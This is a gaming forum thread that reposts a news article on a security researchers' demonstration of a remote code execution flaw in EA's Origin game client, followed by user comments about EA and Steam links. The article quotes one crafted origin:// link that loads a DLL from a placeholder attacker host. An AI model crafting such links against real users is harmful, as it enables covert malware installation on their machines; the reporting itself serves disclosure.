Latest PSU headlines:

Results 1 to 7 of 7
  1. #1
    Peaceful Warrior
    Brandon's Avatar
    Join Date
    Nov 2004
    Age
    29
    Posts
    11,942
    Rep Power
    120
    Points
    108,918 (18,076 Banked)
    Items Ghost in the ShellTidusLightningBruce LeeAppleUser name style
    Achievements IT'S OVER 9000!

    Bug in EAs Origin game platform allows attackers to hijack player PCs

    More than 40 million people could be affected by a vulnerability researchers uncovered in EA's Origin online game platform allowing attackers to remotely execute malicious code on players' computers.

    The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars. It works by manipulating the uniform resource identifiers EA's site uses to automatically start games on an end user's machine. By exploiting flaws in the Origin application available for both Macs and PCs, the technique turns EA's popular game store into an attack platform that can covertly install malware on customers' computers.


    "The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism," ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week's demonstration. "In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim's system, which has Origin installed."


    The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer.


    Update: "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure," an EA spokesman wrote in an e-mail to Ars.


    The attack is similar to an exploit the same researchers demonstrated in October on Steam, a competing online game platform from Valve, with 50 million users. The earlier attack relied on booby-trapped URLs starting with "Steam://" to trick browsers, games, e-mail clients, and other applications into executing code that could compromise the security of the underlying computer. At the time, the researchers advised vulnerable end users to protect themselves against exploits by disabling the automatic launching of Steam:// URLs.


    The Origin attack works much the same. It exploits the functionality that allows sites to start games remotely. By modifying the variables in the underlying URI links, the commands to start a game can be replaced with instructions that cause a computer to install a malicious program instead. One such command, which was included in the demo, is related to the OpenAutomate standard used in software provided with graphics cards from Nvidia. The technique works against people who have installed Crysis 3 and a variety of other games. Other techniques work against machines with different titles installed.


    When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs. Different browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future. Many gamers choose this setting so they aren't prompted in the future. Those users who have selected this setting may not be required to take any interaction to be attacked. Users who want to protect themselves should make sure they are prompted before Origin links are processed.
    Source: http://arstechnica.com/security/2013...All%20content)

    Lol. Oh boy.
    "The biggest adversary in our life is ourselves. We are what we are, in a sense, because of the dominating thoughts we allow to gather in our head. All concepts of self-improvement, all actions and paths we take, relate solely to our abstract image of ourselves. Life is limited only by how we really see ourselves and feel about our being. A great deal of pure self-knowledge and inner understanding allows us to lay an all-important foundation for the structure of our life from which we can perceive and take the right avenues.

  2. #2
    PSU Trophy Manager
    Fenix's Avatar
    Join Date
    Aug 2007
    Location
    Ontario, Canada
    PSN ID
    Faenix1
    Age
    24
    Posts
    11,555
    Rep Power
    87
    Points
    17,813 (1,000 Banked)
    Items Final Fantasy X-2Final Fantasy XIIFangNoctisLightningFinal Fantasy Versus XIIIFinal Fantasy XIII-2Final Fantasy XIIINaughty DogFinal Fantasy XFinal Fantasy VIIPS3 Slim
    Achievements IT'S OVER 9000!
    Dont recall ever hearing about the steam exploit, yet this is everywhere :S

    Sig&Av by Kuro

    Summoning (Destiny of) spirits as I venture back into (FFX) Spira. With a bit of "Catching 'em All!" on the side.

    PS4 Preorders: WatchDogsWitcher3DyingLight

    PSN
    , XBL, Steam: Faenix1 - 3DS Friend Code: 3883-6299-4363
    Phat PS3: February 2008 - June 1st, 2011, Slim PS3: June 3rd 2011 - Present
    PS4, 3DSxl: November 2013 - Present
    PSVita December 2013 - Present

  3. #3
    Peaceful Warrior
    Brandon's Avatar
    Join Date
    Nov 2004
    Age
    29
    Posts
    11,942
    Rep Power
    120
    Points
    108,918 (18,076 Banked)
    Items Ghost in the ShellTidusLightningBruce LeeAppleUser name style
    Achievements IT'S OVER 9000!
    Quote Originally Posted by Fenix View Post
    Dont recall ever hearing about the steam exploit, yet this is everywhere :S
    Probably cuz more people hate EA.

    I actually haven't heard of that one. o_0
    "The biggest adversary in our life is ourselves. We are what we are, in a sense, because of the dominating thoughts we allow to gather in our head. All concepts of self-improvement, all actions and paths we take, relate solely to our abstract image of ourselves. Life is limited only by how we really see ourselves and feel about our being. A great deal of pure self-knowledge and inner understanding allows us to lay an all-important foundation for the structure of our life from which we can perceive and take the right avenues.

  4. #4
    Supreme Veteran

    Join Date
    Feb 2009
    Age
    29
    Posts
    17,585
    Rep Power
    123
    Points
    168 (0 Banked)
    Achievements IT'S OVER 9000!
    E.A have really screwed themselves big time, i mean how dumb have they to be and this is going to be nearly the down fall of E.A or hurt them so so so bad


  5. #5
    Apprentice
    Coconut_Crunch's Avatar
    Join Date
    Feb 2013
    Posts
    359
    Rep Power
    11
    Points
    4,591 (0 Banked)
    yea, sometimes a company needs a few spankings before they become a better company. The current CEO that is stepping down, he was causing a lot of problems. Especially The Sims 3 with overpriced items. Even my wife said that once he joined there was nothing but money symbols in his eye's for the sims 3 game. Now that he is gone, lets hope that a new CEO does a better job and maybe strays away from charging people for every little thing hahaha
    She put the lime in the coconut, she drank them both up.

    http://youtu.be/5LxC3M-Yngs

  6. #6
    Supreme Veteran

    Join Date
    Feb 2009
    Age
    29
    Posts
    17,585
    Rep Power
    123
    Points
    168 (0 Banked)
    Achievements IT'S OVER 9000!
    E.A needs to seek out the roots that made them a massive success back when they actually had respect from gamer's.... Now it is just constant failure after failure

    Where and what next


  7. #7
    Power Member
    keefy's Avatar
    Join Date
    Nov 2007
    Location
    The Sock Gap
    Posts
    16,646
    Rep Power
    120
    Points
    34,237 (0 Banked)
    Items Gran Turismo 5Michelle MarshDoomid SoftwareCommodore 64Metal Gear Solid
    Achievements IT'S OVER 9000!
    The Steam expoit as aroun October last year
    http://www.revuln.com/files/ReVuln_S...Insecurity.pdf

    I have been known to post links here to install a Steam game directly or to add me to our Steam friends list.
    steam://friends/add/

    More Steam protocol commands
    https://developer.valvesoftware.com/...owser_protocol
    Last edited by keefy; 03-20-2013 at 21:35.
    This is a local shop for local people you have no business here!

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

PSU

Playstation Universe

Reproduction in whole or in part in any form or medium without express written permission of Abstract Holdings International Ltd. prohibited.
Use of this site is governed by our Terms of Use and Privacy Policy.

vBCredits II Deluxe v2.1.0 (Pro) - vBulletin Mods & Addons Copyright © 2010-2014 DragonByte Technologies Ltd.